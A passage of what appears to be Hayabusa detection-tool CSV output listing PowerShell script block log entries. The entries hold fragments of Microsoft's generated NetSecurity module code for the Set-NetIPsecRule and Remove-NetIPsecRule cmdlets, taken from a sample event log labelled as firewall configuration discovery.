$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShe,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if 